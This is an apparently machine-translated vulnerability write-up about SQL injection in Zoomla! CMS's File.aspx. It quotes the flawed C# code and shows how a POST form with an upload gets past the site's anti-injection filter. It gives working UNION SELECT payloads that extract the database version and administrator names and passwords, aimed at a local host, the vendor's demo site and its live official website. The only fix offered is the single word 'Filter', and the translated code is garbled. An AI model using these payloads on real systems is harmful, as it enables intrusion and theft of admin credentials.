Home > Cloud Computing > Cloud Security

CMS injection affects the entire CMS2 series and CMS6.0 versions, and affects the official website (no login required)

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

CMS injection affects the entire CMS2 series and CMS6.0 versions, and affects the official website (no login required)

Affected Versions
Zoomla! CMS2_x1.5
Zoomla! CMS2_x2.0
Zoomla! CMS2_x2.1
Zoomla! CMS2_x2.2
Zoomla! CMS2_x2.3
Zoomla! CMS2_x2.4
Zoomla! CMS6.0
Other versions (not tested)

Affected Versions
 





The detailed analysis is as follows:

Problem file: \ Common \ file. aspx

Note: The problem file contains two injections.

Parameter: code



The code analysis is as follows:
 

Protected void Page_Load (object sender, EventArgs e) {string str = "http: //" + HttpContext. current. request. url. authority. toString () + "/UploadFiles/" + this. ull. getLogin (true ). userName; if (base. request. queryString ["code"] = null & base. request. queryString ["FD"]! = Null) {if (base. request. queryString ["ur"] = null & base. request. queryString ["state"] = null) {string value = base. server. urlDecode (base. request. queryString ["FD"]); this. fileUrl = this. fileJiema (value); this. hid. value = base. server. urlDecode (base. request. queryString ["FD"]);} else {if (base. request. queryString ["state"] = null) {string value2 = base. request. queryString ["FD"]. toString (). replace ("", "+" ); This. FileUrl = this. FileJiema (value2); this. hid. Value = value2 ;}} if (base. Request ["state"]! = Null & base. request ["state"] = "tr") {string value3 = base. request. queryString ["FD"];/* first injection: Base64 string with SQL */this. fileUrl = this. fileJiema (value3);/* first injection: decoded string FromBase64String (value); */this. hid. value = value3; this. file = this. bfile. selectFile (string. concat (new object [] {"FileName = '", this. fileUrl, "'and userid =", this. ull. getLogin (true ). userID});/* first injection: this. bfile. selectFile is directly substituted into SQL Injection */if (this. File. downUrl = null) {base. response. write ("0"); base. response. end (); return;} base. response. write ("http: //" + HttpContext. current. request. url. authority. toString () + "/Common/File. aspx? Code = "+ this. file. ExtractionCode); base. Response. End (); return;} else {if (base. Request. QueryString [" ur "]! = Null) {this. file. extractionCode = function. getRandomString (8, 1); this. file. downUrl = str + this. fileUrl; this. file. state = 1; this. file. userID = this. ull. getLogin (true ). userID; this. file. fileName = this. fileUrl; this. bfile. addFile (this. file); base. response. write ("http: //" + HttpContext. current. request. url. authority. toString () + "/Common/File. aspx? Code = "+ this. file. extractionCode); base. response. end (); return ;}} else {/* second injection: the code parameter */if (base. request. queryString ["code"]! = "" & Base. Request. QueryString ["code"]! = Null) {this. file = this. bfile. selectFile ("ExtractionCode = '" + base. request. queryString ["code"] + "'"); base. response. redirect (this. file. downUrl);/* The jump URL cannot contain line breaks. So here I use the interception method and the splicing Method */} this. bfile. the code of the SelectFile method is as follows: public M_File SelectFile (string where) {if (where = "") {this. SQL = "select * from ZL_File";} else {this. SQL = "select * from ZL_File where" + where;/* import the conditions directly into SQL Injection ...}





We can construct the following code:

Local: http: // 192.168.1.100: 8087/Common/File. aspx? Code ='

However, the access will be blocked by SQL injection at this time.

Let's look at the interception code in global:
 

Private void Application_BeginRequest (object sender, EventArgs e) {if (base. request. requestType. toUpper () = "GET" & ZoomlaSecurityCenter. getData () {function. writeMessage ("possible cause: the parameters you submitted are incorrect, contain malicious strings, or check whether the system has enabled the SQL anti-injection function! "," "," Illegal SQL injection or storage! ");} If (base. request. httpMethod. toUpper () = "POST" & HttpContext. current. request. files. count> 0)/* here I can use the post submission method to bypass */{ZoomlaSecurityCenter. checkUpladFiles ();}}



Based on the above analysis, I used the following methods to bypass and inject

The code for creating a form is as follows:

<Form id = "form1" action = "" method = "post"> <input type = "submit" value = "CMS injection"/> </form>



Enter the following URL in the form action.

1. Construct a local injection URL

1.1 Copyright

Note: After the injection, the base. Response. Redirect (this. file. DownUrl) Jump address jump URL cannot contain line breaks. Therefore, we use the interception method and the splicing method here.

Http: // 192.168.1.100: 8087/Common/File. aspx? Code = 'Union select null, 1, SUBSTRING (@ VERSION, 0, 30), null, null, 1, null --
 



1.2 obtain the Administrator

Http: // 192.168.1.100: 8087/Common/File. aspx? Code = 'Union select null, 1, STUFF (AdminPassword, 1, 0, AdminName), null, null, 1, null from ZL_Manager --
 



2 Official demo



2.1 Copyright

Note: After the injection, the base. Response. Redirect (this. file. DownUrl) Jump address jump URL cannot contain line breaks. Therefore, we use the interception method and the splicing method here.

Http://demo.zoomla.cn/Common/File.aspx? Code = 'Union select null, 1, SUBSTRING (@ VERSION, 0, 30), null, null, 1, null --



2.2 obtain the Administrator

Http://demo.zoomla.cn/Common/File.aspx? Code = 'Union select null, 1, STUFF (AdminPassword, 1, 0, AdminName), null, null, 1, null from ZL_Manager --
 

 

3. Official Website



3.1 Copyright

Note: After the injection, the base. Response. Redirect (this. file. DownUrl) Jump address jump URL cannot contain line breaks. Therefore, we use the interception method and the splicing method here.

Http://www.zoomla.cn/Common/File.aspx? Code = 'Union select null, 1, SUBSTRING (@ VERSION, 0, 30), null, null, 1, null --
 



3.2 obtain the Administrator

Http://www.zoomla.cn/Common/File.aspx? Code = 'Union select null, 1, STUFF (AdminPassword, 1, 0, AdminName), null, null, 1, null from ZL_Manager --
 



 

Solution:

Filter

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More